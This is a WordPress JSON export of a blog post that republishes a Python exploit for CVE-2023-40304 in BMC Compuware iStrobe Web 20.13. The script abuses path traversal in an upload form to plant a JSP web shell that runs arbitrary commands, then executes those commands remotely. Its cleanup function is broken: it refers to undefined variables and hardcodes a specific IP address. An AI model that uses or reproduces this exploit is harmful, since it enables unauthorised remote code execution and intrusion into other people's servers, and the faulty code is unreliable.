{"id":56265,"date":"2024-04-15T21:19:44","date_gmt":"2024-04-15T17:19:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178059\/bmcciw2013-shell.txt"},"modified":"2024-04-15T21:19:44","modified_gmt":"2024-04-15T17:19:44","slug":"bmc-compuware-istrobe-web-20-13-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bmc-compuware-istrobe-web-20-13-shell-upload\/","title":{"rendered":"BMC Compuware iStrobe Web 20.13 Shell Upload"},"content":{"rendered":"

#!\/usr\/bin\/env python3<\/p>\n

# Exploit Title: Pre-auth RCE on Compuware iStrobe Web
# Date: 01-08-2023
# Exploit Author: trancap
# Vendor Homepage: https:\/\/www.bmc.com\/
# Version: BMC Compuware iStrobe Web – 20.13
# Tested on: zOS# CVE : CVE-2023-40304
# To exploit this vulnerability you’ll need “Guest access” enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)
# The vulnerable parameter of the form is “fileName”. Using the form, one can upload a webshell (content of the webshell in the “topicText” parameter).# I contacted the vendor but he didn’t consider this a vulnerability because of the Guest access needed.<\/p>\n

import requests
import urllib.parse
import argparse
import sys<\/p>\n

def upload_web_shell(url):
data = {“fileName”:”..\/jsp\/userhelp\/ws.jsp”,”author”:”Guest”,”name”:”test”,”action”:”open”,”topicText”:”<%@
page import=\\”java.lang.*,java.io.*,java.util.*\\” %><%Process
p=Runtime.getRuntime().exec(request.getParameter(\\”cmd\\”));BufferedReader
stdInput = new BufferedReader(new
InputStreamReader(p.getInputStream()));BufferedReader stdError = new
BufferedReader(new InputStreamReader(p.getErrorStream()));String
s=\\”\\”;while((s=stdInput.readLine()) !=
null){out.println(s);};s=\\”\\”;while((s=stdError.readLine()) !=
null){out.println(s);};%>”,”lang”:”en”,”type”:”MODULE”,”status”:”PUB”}
# If encoded, the web shell will not be uploaded properly
data = urllib.parse.urlencode(data, safe='”*<>,=()\/;{}!’)<\/p>\n

# Checking if web shell already uploaded
r = requests.get(f”{url}\/istrobe\/jsp\/userhelp\/ws.jsp”, verify=False)
if r.status_code != 404:
return<\/p>\n

r = requests.post(f”{url}\/istrobe\/userHelp\/saveUserHelp”, data=data,
verify=False)<\/p>\n

if r.status_code == 200:
print(f”[+] Successfully uploaded web shell, it should be
accessible at {url}\/istrobe\/jsp\/userhelp\/ws.jsp”)
else:
sys.exit(“[-] Something went wrong while uploading the web shell”)<\/p>\n

def delete_web_shell(url):
paramsPost = {“fileName”:”..\/jsp\/userhelp\/ws.jsp”,”author”:”Guest”,”name”:”test”,”action”:”delete”,”lang”:”en”,”type”:”MODULE”,”status”:”PUB”}
response = session.post(“http:\/\/220.4.147.38:6301\/istrobe\/userHelp\/deleteUserHelp”,
data=paramsPost, headers=headers, cookies=cookies)<\/p>\n

if r.status_code == 200:
print(f”[+] Successfully deleted web shell”)
else:
sys.exit(“[-] Something went wrong while deleting the web shell”)<\/p>\n

def run_cmd(url, cmd):
data = f”cmd={cmd}”
r = requests.post(f”{url}\/istrobe\/jsp\/userhelp\/ws.jsp”, data=data,
verify=False)<\/p>\n

if r.status_code == 200:
print(r.text)
else:
sys.exit(f'[-] Something went wrong while executing “{cmd}” command’)<\/p>\n

parser = argparse.ArgumentParser(prog=’exploit_cve_2023_40304.py’, description=’CVE-2023-40304 – Pre-auth file upload vulnerability + path traversal to achieve RCE’)
parser.add_argument(‘url’, help=’Vulnerable URL to target. Must be like http(s):\/\/vuln.target’)
parser.add_argument(‘-c’, ‘–cmd’, help=’Command to execute on the remote host (Defaults to “whoami”)’, default=’whoami’)
parser.add_argument(‘–rm’, help=’Deletes the uploaded web shell’, action=’store_true’)
args = parser.parse_args()<\/p>\n

upload_web_shell(args.url)
run_cmd(args.url, args.cmd)<\/p>\n

if args.rm:
delete_web_shell(args.url)<\/p>\n","protected":false},"excerpt":{"rendered":"

#!\/usr\/bin\/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web# Date: 01-08-2023# Exploit Author: trancap# Vendor Homepage: https:\/\/www.bmc.com\/# Version: BMC Compuware iStrobe Web – 20.13# Tested on: zOS# CVE : CVE-2023-40304# To exploit this vulnerability you’ll need “Guest access” enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56265","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56265"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56265\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}